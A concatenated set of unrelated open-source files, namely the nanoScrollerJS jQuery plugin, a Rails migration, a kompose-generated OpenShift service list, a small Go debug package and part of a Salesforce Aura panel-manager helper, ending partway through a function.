can be demonstrated. It re-uses the clock setup from systick_blink
and that means you could do times delays but that aspect isn't used.
After this example we do character handling with interrupts.
| {
"pile_set_name": "Github"
} |
/*! nanoScrollerJS - v0.8.7 - 2015
* http://jamesflorentino.github.com/nanoScrollerJS/
* Copyright (c) 2015 James Florentino; Licensed MIT */
(function(factory) {
if (typeof define === 'function' && define.amd) {
return define(['jquery'], function($) {
return factory($, window, document);
});
} else if (typeof exports === 'object') {
return module.exports = factory(require('jquery'), window, document);
} else {
return factory(jQuery, window, document);
}
})(function($, window, document) {
"use strict";
var BROWSER_IS_IE7, BROWSER_SCROLLBAR_WIDTH, DOMSCROLL, DOWN, DRAG, ENTER, KEYDOWN, KEYUP, MOUSEDOWN, MOUSEENTER, MOUSEMOVE, MOUSEUP, MOUSEWHEEL, NanoScroll, PANEDOWN, RESIZE, SCROLL, SCROLLBAR, TOUCHMOVE, UP, WHEEL, cAF, defaults, getBrowserScrollbarWidth, hasTransform, isFFWithBuggyScrollbar, rAF, transform, _elementStyle, _prefixStyle, _vendor;
defaults = {
/**
a classname for the pane element.
@property paneClass
@type String
@default 'nano-pane'
*/
paneClass: 'nano-pane',
/**
a classname for the slider element.
@property sliderClass
@type String
@default 'nano-slider'
*/
sliderClass: 'nano-slider',
/**
a classname for the content element.
@property contentClass
@type String
@default 'nano-content'
*/
contentClass: 'nano-content',
/**
a classname for enabled mode
@property enabledClass
@type String
@default 'has-scrollbar'
*/
enabledClass: 'has-scrollbar',
/**
a classname for flashed mode
@property flashedClass
@type String
@default 'flashed'
*/
flashedClass: 'flashed',
/**
a classname for active mode
@property activeClass
@type String
@default 'active'
*/
activeClass: 'active',
/**
a setting to enable native scrolling in iOS devices.
@property iOSNativeScrolling
@type Boolean
@default false
*/
iOSNativeScrolling: false,
/**
a setting to prevent the rest of the page being
scrolled when user scrolls the `.content` element.
@property preventPageScrolling
@type Boolean
@default false
*/
preventPageScrolling: false,
/**
a setting to disable binding to the resize event.
@property disableResize
@type Boolean
@default false
*/
disableResize: false,
/**
a setting to make the scrollbar always visible.
@property alwaysVisible
@type Boolean
@default false
*/
alwaysVisible: false,
/**
a default timeout for the `flash()` method.
@property flashDelay
@type Number
@default 1500
*/
flashDelay: 1500,
/**
a minimum height for the `.slider` element.
@property sliderMinHeight
@type Number
@default 20
*/
sliderMinHeight: 20,
/**
a maximum height for the `.slider` element.
@property sliderMaxHeight
@type Number
@default null
*/
sliderMaxHeight: null,
/**
an alternate document context.
@property documentContext
@type Document
@default null
*/
documentContext: null,
/**
an alternate window context.
@property windowContext
@type Window
@default null
*/
windowContext: null
};
/**
@property SCROLLBAR
@type String
@static
@final
@private
*/
SCROLLBAR = 'scrollbar';
/**
@property SCROLL
@type String
@static
@final
@private
*/
SCROLL = 'scroll';
/**
@property MOUSEDOWN
@type String
@final
@private
*/
MOUSEDOWN = 'mousedown';
/**
@property MOUSEENTER
@type String
@final
@private
*/
MOUSEENTER = 'mouseenter';
/**
@property MOUSEMOVE
@type String
@static
@final
@private
*/
MOUSEMOVE = 'mousemove';
/**
@property MOUSEWHEEL
@type String
@final
@private
*/
MOUSEWHEEL = 'mousewheel';
/**
@property MOUSEUP
@type String
@static
@final
@private
*/
MOUSEUP = 'mouseup';
/**
@property RESIZE
@type String
@final
@private
*/
RESIZE = 'resize';
/**
@property DRAG
@type String
@static
@final
@private
*/
DRAG = 'drag';
/**
@property ENTER
@type String
@static
@final
@private
*/
ENTER = 'enter';
/**
@property UP
@type String
@static
@final
@private
*/
UP = 'up';
/**
@property PANEDOWN
@type String
@static
@final
@private
*/
PANEDOWN = 'panedown';
/**
@property DOMSCROLL
@type String
@static
@final
@private
*/
DOMSCROLL = 'DOMMouseScroll';
/**
@property DOWN
@type String
@static
@final
@private
*/
DOWN = 'down';
/**
@property WHEEL
@type String
@static
@final
@private
*/
WHEEL = 'wheel';
/**
@property KEYDOWN
@type String
@static
@final
@private
*/
KEYDOWN = 'keydown';
/**
@property KEYUP
@type String
@static
@final
@private
*/
KEYUP = 'keyup';
/**
@property TOUCHMOVE
@type String
@static
@final
@private
*/
TOUCHMOVE = 'touchmove';
/**
@property BROWSER_IS_IE7
@type Boolean
@static
@final
@private
*/
BROWSER_IS_IE7 = window.navigator.appName === 'Microsoft Internet Explorer' && /msie 7./i.test(window.navigator.appVersion) && window.ActiveXObject;
/**
@property BROWSER_SCROLLBAR_WIDTH
@type Number
@static
@default null
@private
*/
BROWSER_SCROLLBAR_WIDTH = null;
rAF = window.requestAnimationFrame;
cAF = window.cancelAnimationFrame;
_elementStyle = document.createElement('div').style;
_vendor = (function() {
var i, transform, vendor, vendors, _i, _len;
vendors = ['t', 'webkitT', 'MozT', 'msT', 'OT'];
for (i = _i = 0, _len = vendors.length; _i < _len; i = ++_i) {
vendor = vendors[i];
transform = vendors[i] + 'ransform';
if (transform in _elementStyle) {
return vendors[i].substr(0, vendors[i].length - 1);
}
}
return false;
})();
_prefixStyle = function(style) {
if (_vendor === false) {
return false;
}
if (_vendor === '') {
return style;
}
return _vendor + style.charAt(0).toUpperCase() + style.substr(1);
};
transform = _prefixStyle('transform');
hasTransform = transform !== false;
/**
Returns browser's native scrollbar width
@method getBrowserScrollbarWidth
@return {Number} the scrollbar width in pixels
@static
@private
*/
getBrowserScrollbarWidth = function() {
var outer, outerStyle, scrollbarWidth;
outer = document.createElement('div');
outerStyle = outer.style;
outerStyle.position = 'absolute';
outerStyle.width = '100px';
outerStyle.height = '100px';
outerStyle.overflow = SCROLL;
outerStyle.top = '-9999px';
document.body.appendChild(outer);
scrollbarWidth = outer.offsetWidth - outer.clientWidth;
document.body.removeChild(outer);
return scrollbarWidth;
};
isFFWithBuggyScrollbar = function() {
var isOSXFF, ua, version;
ua = window.navigator.userAgent;
isOSXFF = /(?=.+Mac OS X)(?=.+Firefox)/.test(ua);
if (!isOSXFF) {
return false;
}
version = /Firefox\/\d{2}\./.exec(ua);
if (version) {
version = version[0].replace(/\D+/g, '');
}
return isOSXFF && +version > 23;
};
/**
@class NanoScroll
@param element {HTMLElement|Node} the main element
@param options {Object} nanoScroller's options
@constructor
*/
NanoScroll = (function() {
function NanoScroll(el, options) {
this.el = el;
this.options = options;
BROWSER_SCROLLBAR_WIDTH || (BROWSER_SCROLLBAR_WIDTH = getBrowserScrollbarWidth());
this.$el = $(this.el);
this.doc = $(this.options.documentContext || document);
this.win = $(this.options.windowContext || window);
this.body = this.doc.find('body');
this.$content = this.$el.children("." + this.options.contentClass);
this.$content.attr('tabindex', this.options.tabIndex || 0);
this.content = this.$content[0];
this.previousPosition = 0;
if (this.options.iOSNativeScrolling && (this.el.style.WebkitOverflowScrolling != null)) {
this.nativeScrolling();
} else {
this.generate();
}
this.createEvents();
this.addEvents();
this.reset();
}
/**
Prevents the rest of the page being scrolled
when user scrolls the `.nano-content` element.
@method preventScrolling
@param event {Event}
@param direction {String} Scroll direction (up or down)
@private
*/
NanoScroll.prototype.preventScrolling = function(e, direction) {
if (!this.isActive) {
return;
}
if (e.type === DOMSCROLL) {
if (direction === DOWN && e.originalEvent.detail > 0 || direction === UP && e.originalEvent.detail < 0) {
e.preventDefault();
}
} else if (e.type === MOUSEWHEEL) {
if (!e.originalEvent || !e.originalEvent.wheelDelta) {
return;
}
if (direction === DOWN && e.originalEvent.wheelDelta < 0 || direction === UP && e.originalEvent.wheelDelta > 0) {
e.preventDefault();
}
}
};
/**
Enable iOS native scrolling
@method nativeScrolling
@private
*/
NanoScroll.prototype.nativeScrolling = function() {
this.$content.css({
WebkitOverflowScrolling: 'touch'
});
this.iOSNativeScrolling = true;
this.isActive = true;
};
/**
Updates those nanoScroller properties that
are related to current scrollbar position.
@method updateScrollValues
@private
*/
NanoScroll.prototype.updateScrollValues = function() {
var content, direction;
content = this.content;
this.maxScrollTop = content.scrollHeight - content.clientHeight;
this.prevScrollTop = this.contentScrollTop || 0;
this.contentScrollTop = content.scrollTop;
direction = this.contentScrollTop > this.previousPosition ? "down" : this.contentScrollTop < this.previousPosition ? "up" : "same";
this.previousPosition = this.contentScrollTop;
if (direction !== "same") {
this.$el.trigger('update', {
position: this.contentScrollTop,
maximum: this.maxScrollTop,
direction: direction
});
}
if (!this.iOSNativeScrolling) {
this.maxSliderTop = this.paneHeight - this.sliderHeight;
this.sliderTop = this.maxScrollTop === 0 ? 0 : this.contentScrollTop * this.maxSliderTop / this.maxScrollTop;
}
};
/**
Updates CSS styles for current scroll position.
Uses CSS 2d transfroms and `window.requestAnimationFrame` if available.
@method setOnScrollStyles
@private
*/
NanoScroll.prototype.setOnScrollStyles = function() {
var cssValue;
if (hasTransform) {
cssValue = {};
cssValue[transform] = "translate(0, " + this.sliderTop + "px)";
} else {
cssValue = {
top: this.sliderTop
};
}
if (rAF) {
if (cAF && this.scrollRAF) {
cAF(this.scrollRAF);
}
this.scrollRAF = rAF((function(_this) {
return function() {
_this.scrollRAF = null;
return _this.slider.css(cssValue);
};
})(this));
} else {
this.slider.css(cssValue);
}
};
/**
Creates event related methods
@method createEvents
@private
*/
NanoScroll.prototype.createEvents = function() {
this.events = {
down: (function(_this) {
return function(e) {
_this.isBeingDragged = true;
_this.offsetY = e.pageY - _this.slider.offset().top;
if (!_this.slider.is(e.target)) {
_this.offsetY = 0;
}
_this.pane.addClass(_this.options.activeClass);
_this.doc.bind(MOUSEMOVE, _this.events[DRAG]).bind(MOUSEUP, _this.events[UP]);
_this.body.bind(MOUSEENTER, _this.events[ENTER]);
return false;
};
})(this),
drag: (function(_this) {
return function(e) {
_this.sliderY = e.pageY - _this.$el.offset().top - _this.paneTop - (_this.offsetY || _this.sliderHeight * 0.5);
_this.scroll();
if (_this.contentScrollTop >= _this.maxScrollTop && _this.prevScrollTop !== _this.maxScrollTop) {
_this.$el.trigger('scrollend');
} else if (_this.contentScrollTop === 0 && _this.prevScrollTop !== 0) {
_this.$el.trigger('scrolltop');
}
return false;
};
})(this),
up: (function(_this) {
return function(e) {
_this.isBeingDragged = false;
_this.pane.removeClass(_this.options.activeClass);
_this.doc.unbind(MOUSEMOVE, _this.events[DRAG]).unbind(MOUSEUP, _this.events[UP]);
_this.body.unbind(MOUSEENTER, _this.events[ENTER]);
return false;
};
})(this),
resize: (function(_this) {
return function(e) {
_this.reset();
};
})(this),
panedown: (function(_this) {
return function(e) {
_this.sliderY = (e.offsetY || e.originalEvent.layerY) - (_this.sliderHeight * 0.5);
_this.scroll();
_this.events.down(e);
return false;
};
})(this),
scroll: (function(_this) {
return function(e) {
_this.updateScrollValues();
if (_this.isBeingDragged) {
return;
}
if (!_this.iOSNativeScrolling) {
_this.sliderY = _this.sliderTop;
_this.setOnScrollStyles();
}
if (e == null) {
return;
}
if (_this.contentScrollTop >= _this.maxScrollTop) {
if (_this.options.preventPageScrolling) {
_this.preventScrolling(e, DOWN);
}
if (_this.prevScrollTop !== _this.maxScrollTop) {
_this.$el.trigger('scrollend');
}
} else if (_this.contentScrollTop === 0) {
if (_this.options.preventPageScrolling) {
_this.preventScrolling(e, UP);
}
if (_this.prevScrollTop !== 0) {
_this.$el.trigger('scrolltop');
}
}
};
})(this),
wheel: (function(_this) {
return function(e) {
var delta;
if (e == null) {
return;
}
delta = e.delta || e.wheelDelta || (e.originalEvent && e.originalEvent.wheelDelta) || -e.detail || (e.originalEvent && -e.originalEvent.detail);
if (delta) {
_this.sliderY += -delta / 3;
}
_this.scroll();
return false;
};
})(this),
enter: (function(_this) {
return function(e) {
var _ref;
if (!_this.isBeingDragged) {
return;
}
if ((e.buttons || e.which) !== 1) {
return (_ref = _this.events)[UP].apply(_ref, arguments);
}
};
})(this)
};
};
/**
Adds event listeners with jQuery.
@method addEvents
@private
*/
NanoScroll.prototype.addEvents = function() {
var events;
this.removeEvents();
events = this.events;
if (!this.options.disableResize) {
this.win.bind(RESIZE, events[RESIZE]);
}
if (!this.iOSNativeScrolling) {
this.slider.bind(MOUSEDOWN, events[DOWN]);
this.pane.bind(MOUSEDOWN, events[PANEDOWN]).bind("" + MOUSEWHEEL + " " + DOMSCROLL, events[WHEEL]);
}
this.$content.bind("" + SCROLL + " " + MOUSEWHEEL + " " + DOMSCROLL + " " + TOUCHMOVE, events[SCROLL]);
};
/**
Removes event listeners with jQuery.
@method removeEvents
@private
*/
NanoScroll.prototype.removeEvents = function() {
var events;
events = this.events;
this.win.unbind(RESIZE, events[RESIZE]);
if (!this.iOSNativeScrolling) {
this.slider.unbind();
this.pane.unbind();
}
this.$content.unbind("" + SCROLL + " " + MOUSEWHEEL + " " + DOMSCROLL + " " + TOUCHMOVE, events[SCROLL]);
};
/**
Generates nanoScroller's scrollbar and elements for it.
@method generate
@chainable
@private
*/
NanoScroll.prototype.generate = function() {
var contentClass, cssRule, currentPadding, options, pane, paneClass, sliderClass;
options = this.options;
paneClass = options.paneClass, sliderClass = options.sliderClass, contentClass = options.contentClass;
if (!(pane = this.$el.children("." + paneClass)).length && !pane.children("." + sliderClass).length) {
this.$el.append("<div class=\"" + paneClass + "\"><div class=\"" + sliderClass + "\" /></div>");
}
this.pane = this.$el.children("." + paneClass);
this.slider = this.pane.find("." + sliderClass);
if (BROWSER_SCROLLBAR_WIDTH === 0 && isFFWithBuggyScrollbar()) {
currentPadding = window.getComputedStyle(this.content, null).getPropertyValue('padding-right').replace(/[^0-9.]+/g, '');
cssRule = {
right: -14,
paddingRight: +currentPadding + 14
};
} else if (BROWSER_SCROLLBAR_WIDTH) {
cssRule = {
right: -BROWSER_SCROLLBAR_WIDTH
};
this.$el.addClass(options.enabledClass);
}
if (cssRule != null) {
this.$content.css(cssRule);
}
return this;
};
/**
@method restore
@private
*/
NanoScroll.prototype.restore = function() {
this.stopped = false;
if (!this.iOSNativeScrolling) {
this.pane.show();
}
this.addEvents();
};
/**
Resets nanoScroller's scrollbar.
@method reset
@chainable
@example
$(".nano").nanoScroller();
*/
NanoScroll.prototype.reset = function() {
var content, contentHeight, contentPosition, contentStyle, contentStyleOverflowY, paneBottom, paneHeight, paneOuterHeight, paneTop, parentMaxHeight, right, sliderHeight;
if (this.iOSNativeScrolling) {
this.contentHeight = this.content.scrollHeight;
return;
}
if (!this.$el.find("." + this.options.paneClass).length) {
this.generate().stop();
}
if (this.stopped) {
this.restore();
}
content = this.content;
contentStyle = content.style;
contentStyleOverflowY = contentStyle.overflowY;
if (BROWSER_IS_IE7) {
this.$content.css({
height: this.$content.height()
});
}
contentHeight = content.scrollHeight + BROWSER_SCROLLBAR_WIDTH;
parentMaxHeight = parseInt(this.$el.css("max-height"), 10);
if (parentMaxHeight > 0) {
this.$el.height("");
this.$el.height(content.scrollHeight > parentMaxHeight ? parentMaxHeight : content.scrollHeight);
}
paneHeight = this.pane.outerHeight(false);
paneTop = parseInt(this.pane.css('top'), 10);
paneBottom = parseInt(this.pane.css('bottom'), 10);
paneOuterHeight = paneHeight + paneTop + paneBottom;
sliderHeight = Math.round(paneOuterHeight / contentHeight * paneHeight);
if (sliderHeight < this.options.sliderMinHeight) {
sliderHeight = this.options.sliderMinHeight;
} else if ((this.options.sliderMaxHeight != null) && sliderHeight > this.options.sliderMaxHeight) {
sliderHeight = this.options.sliderMaxHeight;
}
if (contentStyleOverflowY === SCROLL && contentStyle.overflowX !== SCROLL) {
sliderHeight += BROWSER_SCROLLBAR_WIDTH;
}
this.maxSliderTop = paneOuterHeight - sliderHeight;
this.contentHeight = contentHeight;
this.paneHeight = paneHeight;
this.paneOuterHeight = paneOuterHeight;
this.sliderHeight = sliderHeight;
this.paneTop = paneTop;
this.slider.height(sliderHeight);
this.events.scroll();
this.pane.show();
this.isActive = true;
if ((content.scrollHeight === content.clientHeight) || (this.pane.outerHeight(true) >= content.scrollHeight && contentStyleOverflowY !== SCROLL)) {
this.pane.hide();
this.isActive = false;
} else if (this.el.clientHeight === content.scrollHeight && contentStyleOverflowY === SCROLL) {
this.slider.hide();
} else {
this.slider.show();
}
this.pane.css({
opacity: (this.options.alwaysVisible ? 1 : ''),
visibility: (this.options.alwaysVisible ? 'visible' : '')
});
contentPosition = this.$content.css('position');
if (contentPosition === 'static' || contentPosition === 'relative') {
right = parseInt(this.$content.css('right'), 10);
if (right) {
this.$content.css({
right: '',
marginRight: right
});
}
}
return this;
};
/**
@method scroll
@private
@example
$(".nano").nanoScroller({ scroll: 'top' });
*/
NanoScroll.prototype.scroll = function() {
if (!this.isActive) {
return;
}
this.sliderY = Math.max(0, this.sliderY);
this.sliderY = Math.min(this.maxSliderTop, this.sliderY);
this.$content.scrollTop(this.maxScrollTop * this.sliderY / this.maxSliderTop);
if (!this.iOSNativeScrolling) {
this.updateScrollValues();
this.setOnScrollStyles();
}
return this;
};
/**
Scroll at the bottom with an offset value
@method scrollBottom
@param offsetY {Number}
@chainable
@example
$(".nano").nanoScroller({ scrollBottom: value });
*/
NanoScroll.prototype.scrollBottom = function(offsetY) {
if (!this.isActive) {
return;
}
this.$content.scrollTop(this.contentHeight - this.$content.height() - offsetY).trigger(MOUSEWHEEL);
this.stop().restore();
return this;
};
/**
Scroll at the top with an offset value
@method scrollTop
@param offsetY {Number}
@chainable
@example
$(".nano").nanoScroller({ scrollTop: value });
*/
NanoScroll.prototype.scrollTop = function(offsetY) {
if (!this.isActive) {
return;
}
this.$content.scrollTop(+offsetY).trigger(MOUSEWHEEL);
this.stop().restore();
return this;
};
/**
Scroll to an element
@method scrollTo
@param node {Node} A node to scroll to.
@chainable
@example
$(".nano").nanoScroller({ scrollTo: $('#a_node') });
*/
NanoScroll.prototype.scrollTo = function(node) {
if (!this.isActive) {
return;
}
this.scrollTop(this.$el.find(node).get(0).offsetTop);
return this;
};
/**
To stop the operation.
This option will tell the plugin to disable all event bindings and hide the gadget scrollbar from the UI.
@method stop
@chainable
@example
$(".nano").nanoScroller({ stop: true });
*/
NanoScroll.prototype.stop = function() {
if (cAF && this.scrollRAF) {
cAF(this.scrollRAF);
this.scrollRAF = null;
}
this.stopped = true;
this.removeEvents();
if (!this.iOSNativeScrolling) {
this.pane.hide();
}
return this;
};
/**
Destroys nanoScroller and restores browser's native scrollbar.
@method destroy
@chainable
@example
$(".nano").nanoScroller({ destroy: true });
*/
NanoScroll.prototype.destroy = function() {
if (!this.stopped) {
this.stop();
}
if (!this.iOSNativeScrolling && this.pane.length) {
this.pane.remove();
}
if (BROWSER_IS_IE7) {
this.$content.height('');
}
this.$content.removeAttr('tabindex');
if (this.$el.hasClass(this.options.enabledClass)) {
this.$el.removeClass(this.options.enabledClass);
this.$content.css({
right: ''
});
}
return this;
};
/**
To flash the scrollbar gadget for an amount of time defined in plugin settings (defaults to 1,5s).
Useful if you want to show the user (e.g. on pageload) that there is more content waiting for him.
@method flash
@chainable
@example
$(".nano").nanoScroller({ flash: true });
*/
NanoScroll.prototype.flash = function() {
if (this.iOSNativeScrolling) {
return;
}
if (!this.isActive) {
return;
}
this.reset();
this.pane.addClass(this.options.flashedClass);
setTimeout((function(_this) {
return function() {
_this.pane.removeClass(_this.options.flashedClass);
};
})(this), this.options.flashDelay);
return this;
};
return NanoScroll;
})();
$.fn.nanoScroller = function(settings) {
return this.each(function() {
var options, scrollbar;
if (!(scrollbar = this.nanoscroller)) {
options = $.extend({}, defaults, settings);
this.nanoscroller = scrollbar = new NanoScroll(this, options);
}
if (settings && typeof settings === "object") {
$.extend(scrollbar.options, settings);
if (settings.scrollBottom != null) {
return scrollbar.scrollBottom(settings.scrollBottom);
}
if (settings.scrollTop != null) {
return scrollbar.scrollTop(settings.scrollTop);
}
if (settings.scrollTo) {
return scrollbar.scrollTo(settings.scrollTo);
}
if (settings.scroll === 'bottom') {
return scrollbar.scrollBottom(0);
}
if (settings.scroll === 'top') {
return scrollbar.scrollTop(0);
}
if (settings.scroll && settings.scroll instanceof $) {
return scrollbar.scrollTo(settings.scroll);
}
if (settings.stop) {
return scrollbar.stop();
}
if (settings.destroy) {
return scrollbar.destroy();
}
if (settings.flash) {
return scrollbar.flash();
}
}
return scrollbar.reset();
});
};
$.fn.nanoScroller.Constructor = NanoScroll;
});
//# sourceMappingURL=jquery.nanoscroller.js.map
| {
"pile_set_name": "Github"
} |
class CacheLookupValuesCount < ActiveRecord::Migration[4.2]
def up
execute "update lookup_keys set lookup_values_count=(select count(*) from lookup_values where lookup_key_id=lookup_keys.id)"
end
def down
end
end
| {
"pile_set_name": "Github"
} |
{
"kind": "List",
"apiVersion": "v1",
"metadata": {},
"items": [
{
"kind": "Service",
"apiVersion": "v1",
"metadata": {
"name": "redis",
"creationTimestamp": null,
"labels": {
"io.kompose.service": "redis"
},
"annotations": {
"kompose.cmd": "kompose --provider=openshift convert --stdout -j",
"kompose.version": "%VERSION%"
}
},
"spec": {
"ports": [
{
"name": "6379",
"port": 6379,
"targetPort": 6379
}
],
"selector": {
"io.kompose.service": "redis"
}
},
"status": {
"loadBalancer": {}
}
},
{
"kind": "Service",
"apiVersion": "v1",
"metadata": {
"name": "web",
"creationTimestamp": null,
"labels": {
"io.kompose.service": "web"
},
"annotations": {
"kompose.cmd": "kompose --provider=openshift convert --stdout -j",
"kompose.version": "%VERSION%"
}
},
"spec": {
"ports": [
{
"name": "5000",
"port": 5000,
"targetPort": 5000
}
],
"selector": {
"io.kompose.service": "web"
}
},
"status": {
"loadBalancer": {}
}
},
{
"kind": "DeploymentConfig",
"apiVersion": "v1",
"metadata": {
"name": "redis",
"creationTimestamp": null,
"labels": {
"io.kompose.service": "redis"
},
"annotations": {
"kompose.cmd": "kompose --provider=openshift convert --stdout -j",
"kompose.version": "%VERSION%"
}
},
"spec": {
"strategy": {
"resources": {}
},
"triggers": [
{
"type": "ConfigChange"
},
{
"type": "ImageChange",
"imageChangeParams": {
"automatic": true,
"containerNames": [
"redis"
],
"from": {
"kind": "ImageStreamTag",
"name": "redis:3.0"
}
}
}
],
"replicas": 1,
"test": false,
"selector": {
"io.kompose.service": "redis"
},
"template": {
"metadata": {
"creationTimestamp": null,
"labels": {
"io.kompose.service": "redis"
}
},
"spec": {
"containers": [
{
"name": "redis",
"image": " ",
"ports": [
{
"containerPort": 6379
}
],
"resources": {}
}
],
"restartPolicy": "Always"
}
}
},
"status": {}
},
{
"kind": "ImageStream",
"apiVersion": "v1",
"metadata": {
"name": "redis",
"creationTimestamp": null,
"labels": {
"io.kompose.service": "redis"
}
},
"spec": {
"tags": [
{
"name": "3.0",
"annotations": null,
"from": {
"kind": "DockerImage",
"name": "redis:3.0"
},
"generation": null,
"importPolicy": {}
}
]
},
"status": {
"dockerImageRepository": ""
}
},
{
"kind": "DeploymentConfig",
"apiVersion": "v1",
"metadata": {
"name": "web",
"creationTimestamp": null,
"labels": {
"io.kompose.service": "web"
},
"annotations": {
"kompose.cmd": "kompose --provider=openshift convert --stdout -j",
"kompose.version": "%VERSION%"
}
},
"spec": {
"strategy": {
"resources": {}
},
"triggers": [
{
"type": "ConfigChange"
},
{
"type": "ImageChange",
"imageChangeParams": {
"automatic": true,
"containerNames": [
"web"
],
"from": {
"kind": "ImageStreamTag",
"name": "web:latest"
}
}
}
],
"replicas": 1,
"test": false,
"selector": {
"io.kompose.service": "web"
},
"template": {
"metadata": {
"creationTimestamp": null,
"labels": {
"io.kompose.service": "web"
}
},
"spec": {
"containers": [
{
"name": "web",
"image": " ",
"ports": [
{
"containerPort": 5000
}
],
"resources": {}
}
],
"restartPolicy": "Always"
}
}
},
"status": {}
},
{
"kind": "ImageStream",
"apiVersion": "v1",
"metadata": {
"name": "web",
"creationTimestamp": null,
"labels": {
"io.kompose.service": "web"
}
},
"spec": {
"tags": [
{
"name": "latest",
"annotations": null,
"from": {
"kind": "DockerImage",
"name": "tuna/docker-counter23"
},
"generation": null,
"importPolicy": {}
}
]
},
"status": {
"dockerImageRepository": ""
}
}
]
}
| {
"pile_set_name": "Github"
} |
package lintdebug
import "fmt"
var (
callbacks []func(string)
)
// Send a debug message
func Send(msg string, args ...interface{}) {
formatted := fmt.Sprintf(msg, args...)
for _, cb := range callbacks {
cb(formatted)
}
}
// Register debug events receiver. There must be only one receiver
func Register(cb func(string)) {
callbacks = append(callbacks, cb)
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2013 salesforce.com, inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
({
PANELS_OWNER : {}, // Owner relationship who creates the panel (key) owned by -> value
PANELS_STACK : [], // The Panel Stack ordering
PANELS_INSTANCE : {}, // Registered instances
containerManager: null, // a reference to containerManager
hasLocationChangeHandler: false, // Indicate if we already attach a locationChange handler
initialize: function(cmp) {
var containerManager = this.cmLib.containerManager;
var sharedContainer = cmp.get('v.useSharedContainer');
this.containerManager = sharedContainer ? containerManager.getSharedInstance() : containerManager.createInstance(cmp.find('container'));
this.initializeRegisteredPanels(cmp);
},
/*
* Store internal defs
* @private
*/
initializeRegisteredPanels: function (cmp, newPanels) {
this.containerManager.registerContainers(newPanels || cmp.get('v.registeredPanels') || []);
},
/*
* Dynamically register panels. Used to register feature specific panels.
* @private
*/
registerPanels: function(cmp, params) {
var panels = params.panels;
if (panels) {
this.containerManager.registerContainers(panels);
if ($A.util.isFunction(params.callback)) {
params.callback();
}
}
},
/*
* Create panel
* @public
*/
createPanel: function (cmp, config) {
var panelConfig = config.panelConfig || {};
var referenceElement = panelConfig.referenceElement;
panelConfig.referenceElement = null;
// Create panel instance
var panel = this.createPanelInstance(cmp, config);
if (referenceElement) {
panel.set('v.referenceElement', referenceElement);
}
// Save instance config
this.PANELS_INSTANCE[panel.getGlobalId()] = {
panel : panel,
destroyCallback : config.onDestroy,
closeOnLocationChange: this.getLocationChangeFlag(cmp, config)
};
// Set owner
this.setPanelOwner(panel, config.owner);
// onInit
if (config.onInit) {
config.onInit(panel);
}
// Render
this.renderPanelInstance(cmp, panel, config);
// Stack panel
this.stackPanel(panel);
// onCreate
if (config.onCreate) {
config.onCreate(panel);
}
},
/*
* Get Active panel
* @public
*/
getActivePanel: function (cmp, callback) {
// TODO: Instead of assuming is the last one (which doesnt guarantee that is "active")
// Change the logic on active to make sure we save that state internally
var stack = this.PANELS_STACK;
var panel = stack[stack.length - 1];
if (panel && $A.util.isFunction(callback)) {
callback(panel);
} else if($A.util.isFunction(callback)) {
callback(null);
}
},
/*
* Sets the context in which the panel is created
* This is mostly to figure out the the relationship between two panels
* This function should be called before stacking a new panel
*/
setPanelOwner: function (panel, givenOwner) {
var owner = givenOwner;
if (!owner) {
var previousBody = null;
if (this.PANELS_STACK.length > 0) {
var previousPanel = this.PANELS_STACK[this.PANELS_STACK.length - 1];
previousBody = previousPanel.isValid() ? previousPanel.get('v.body') : previousBody;
}
owner = $A.util.isEmpty(previousBody) ? panel.getGlobalId() : previousBody[0].getGlobalId();
}
this.PANELS_OWNER[panel.getGlobalId()] = owner;
},
/*
* Stack a panel in our internal structures
*/
stackPanel: function (panel) {
var stackManager = this.smLib.stackManager;
this.PANELS_ZINDEX++;
this.PANELS_STACK.push(panel);
stackManager.bringToFront(panel);
},
/*
* stack an element as if it was a panel
*/
stackElement: function (cb) {
this.PANELS_ZINDEX++;
cb(this.PANELS_ZOFFSET + this.PANELS_ZINDEX);
},
/*
* Create panel instance
* @private
*/
createPanelInstance: function (cmp, config) {
// Internal usage of panel will rely on AVP to work properly, and no access check issue.
// but if panel is created by overlayLibrary, it means the body could be custom component
// for example c:modalContent which can't access ui namespace.
var isCustomPanel = config.panelConfig && config.panelConfig.isCustomPanel;
var panel = this.containerManager.createContainer({
containerType : config.panelType,
containerConfig : config.panelConfig,
containerValueProvider : cmp
});
var header = panel.get('v.header'),
body = panel.get('v.body'),
footer = panel.get('v.footer'),
avp = panel,
i, length;
if (!$A.util.isEmpty(body)) {
body[0].setAttributeValueProvider(panel);
// if panel isn't created by overlayLibrary, set AVP to body[0], otherwise keep with panel.
if (isCustomPanel !== true) {
avp = body[0];
}
}
if (!$A.util.isEmpty(header)) {
for (i = 0, length = header.length; i < length; i++) {
header[i].setAttributeValueProvider(avp);
}
}
if (!$A.util.isEmpty(footer)) {
for (i = 0, length = footer.length; i < length; i++) {
footer[i].setAttributeValueProvider(avp);
}
}
return panel;
},
beforeShow: function(cmp, config) {
var panelParam = config.panelInstance,
panelId = $A.util.isComponent(panelParam) ? panelParam.getGlobalId() : panelParam,
panelObj = this.PANELS_INSTANCE[panelId],
panel = panelObj.panel;
this.pushReturnFocusElement(panel);
$A.assert(panelObj, 'Couldnt find instance to show');
// de-active all other panels except the one currently shown
this.deactivateAllPanelInstances(cmp, panel);
},
/*
* Destroy panel instance
* @private
*/
destroyPanel: function (cmp, config, doActivateNext) {
config = config || {};
var stack = this.PANELS_STACK,
shouldReturnFocus = config.shouldReturnFocus,
panelParam = config.panelInstance,
panelId = $A.util.isComponent(panelParam) ? panelParam.getGlobalId() : panelParam,
panelObj = this.PANELS_INSTANCE[panelId],
panel = panelObj.panel,
index = stack.indexOf(panel);
// shouldReturnFocus should default to true if it is not explicitly passed in.
if ($A.util.isUndefinedOrNull(shouldReturnFocus)) {
shouldReturnFocus = true;
}
$A.assert(panelObj, 'Couldnt find instance to destroy');
$A.assert(index > -1, 'Couldnt find the reference in the stack');
stack.splice(index, 1);
// pop return focus before panel is destroyed.
var returnFocus = this.popReturnFocusElement(panel);
this.containerManager.destroyContainer(panel);
delete this.PANELS_OWNER[panelId];
delete this.PANELS_INSTANCE[panelId];
// Notify the destroy
config.onDestroy && config.onDestroy();
if (panelObj.destroyCallback) {
panelObj.destroyCallback(panelId);
